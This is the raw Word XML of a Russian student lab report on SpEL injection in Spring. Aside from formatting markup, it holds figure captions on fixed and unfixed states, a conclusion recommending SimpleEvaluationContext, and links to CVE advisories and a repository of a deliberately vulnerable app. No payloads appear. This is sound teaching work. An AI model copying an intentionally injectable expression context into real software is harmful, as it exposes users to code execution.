        <w:t>Рисунок 10 – Уязвимость исправлена</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CF1267" w14:textId="5B2CFDCB" w:rsidR="00247B75" w:rsidRDefault="00247B75" w:rsidP="00247B75">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00247B75">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25C2687B" wp14:editId="2E2EF9AC">
            <wp:extent cx="5645440" cy="10160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5440" cy="1016052"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68114B6E" w14:textId="6BECADAC" w:rsidR="00247B75" w:rsidRPr="00247B75" w:rsidRDefault="00247B75" w:rsidP="00247B75">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 11 – Уязвимость не исправлена</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA899FE" w14:textId="556368A6" w:rsidR="009C4822" w:rsidRDefault="009C4822" w:rsidP="009C4822">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B286CA" w14:textId="2F37A98A" w:rsidR="009C4822" w:rsidRPr="00511F81" w:rsidRDefault="00511F81" w:rsidP="009C4822">
      <w:r>
        <w:t xml:space="preserve">В рамках данной лабораторной работы было реализовано приложение, реализующее уязвимость </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SpEL</w:t>
      </w:r>
      <w:r w:rsidRPr="00511F81">
        <w:t>. В приложениях Spring рекомендуется использовать вместо полнофункционального StandardEcalutionContext более урезанный по возможностям SimpleEvaluationContext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, так как </w:t>
      </w:r>
      <w:r w:rsidRPr="00511F81">
        <w:t xml:space="preserve">у SimpleEvaluationContext </w:t>
      </w:r>
      <w:r w:rsidR="00637834" w:rsidRPr="00511F81">
        <w:t>нет,</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00511F81">
        <w:t xml:space="preserve"> и ссылаться на другие бины.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Поэтому данный контекст более безопасный, чем </w:t>
      </w:r>
      <w:r w:rsidRPr="00511F81">
        <w:t>StandardEcalutionContext</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4990C0" w14:textId="77777777" w:rsidR="00511F81" w:rsidRPr="00511F81" w:rsidRDefault="00511F81" w:rsidP="009C4822"/>
    <w:p w14:paraId="4A8E3589" w14:textId="77777777" w:rsidR="009C4822" w:rsidRPr="009C4822" w:rsidRDefault="009C4822" w:rsidP="009C4822"/>
    <w:p w14:paraId="33E8215F" w14:textId="339980F2" w:rsidR="009C4822" w:rsidRPr="009C4822" w:rsidRDefault="009C4822" w:rsidP="009C4822"/>
    <w:sectPr w:rsidR="009C4822" w:rsidRPr="009C482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F50D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C3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A5797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370A67"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6350667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3F485BD2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A87401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28645DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7376E0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849"/>
    <w:rsid w:val="00090669"/>
    <w:rsid w:val="0013017F"/>
    <w:rsid w:val="001515FB"/>
    <w:rsid w:val="00195513"/>
    <w:rsid w:val="0022681E"/>
    <w:rsid w:val="00227490"/>
    <w:rsid w:val="00247B75"/>
    <w:rsid w:val="00337DB7"/>
    <w:rsid w:val="003D1124"/>
    <w:rsid w:val="00502044"/>
    <w:rsid w:val="00511F81"/>
    <w:rsid w:val="005B3849"/>
    <w:rsid w:val="005E30CF"/>
    <w:rsid w:val="005E3805"/>
    <w:rsid w:val="006037E3"/>
    <w:rsid w:val="00637834"/>
    <w:rsid w:val="007745EE"/>
    <w:rsid w:val="00827136"/>
    <w:rsid w:val="009572B1"/>
    <w:rsid w:val="009C4822"/>
    <w:rsid w:val="00AE10F2"/>
    <w:rsid w:val="00B05FBD"/>
    <w:rsid w:val="00B4208F"/>
    <w:rsid w:val="00B709E6"/>
    <w:rsid w:val="00B821CD"/>
    <w:rsid w:val="00BE2B24"/>
    <w:rsid w:val="00D44CFE"/>
    <w:rsid w:val="00D510EE"/>
    <w:rsid w:val="00DD5910"/>
    <w:rsid w:val="00DF7AF1"/>
    <w:rsid w:val="00E04BEE"/>
    <w:rsid w:val="00F55ECD"/>
    <w:rsid w:val="00F74680"/>
    <w:rsid w:val="00FF50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6CE4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AD2BCCCC-D27B-4793-9F29-9799DCB32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910"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="851"/>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="006037E3"/>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D591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B4208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B420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mes142">
    <w:name w:val="Times14_РИО2 Знак"/>
    <w:link w:val="Times1420"/>
    <w:locked/>
    <w:rsid w:val="006037E3"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Times1420">
    <w:name w:val="Times14_РИО2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Times142"/>
    <w:qFormat/>
    <w:rsid w:val="006037E3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="709"/>
      </w:tabs>
      <w:spacing w:line="312" w:lineRule="auto"/>
      <w:ind w:firstLine="709"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1">
    <w:name w:val="Название книги1"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="006037E3"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="006037E3"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00DD5910"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta">
    <w:name w:val="hljs-meta"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B709E6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-function">
    <w:name w:val="hljs-function"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B709E6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B709E6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B709E6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B709E6"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B709E6"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00130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3017F"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hl-keyword">
    <w:name w:val="hl-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0013017F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hl-string">
    <w:name w:val="hl-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0013017F"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="0013017F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="listitem">
    <w:name w:val="listitem"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0013017F"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:contextualSpacing w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hl-comment">
    <w:name w:val="hl-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0013017F"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003D1124"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003D1124"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00337DB7"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00B4208F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00B4208F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>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921">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="159735159">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="270477687">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="396247268">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="793326023">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="854853569">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="929116959">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1088311932">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1248536448">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1357653098">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1608659724">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1804545013">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1828787846">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1908489733">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2018538628">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="202617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anzu.vmware.com/security/cve-2017-8046"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tanzu.vmware.com/security/cve-2018-1273" TargetMode="Externa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JoolsBlinnikova/SpEL_injection.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JoolsBlinnikova/SpEL_injection.git"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ecuritylab.ru/analytics/488855.php" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.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1EFD9-A340-4E3F-A20A-ED56015E2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12</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Blinnikova</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Julia Blinnikova</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-06T15:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-15T10:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>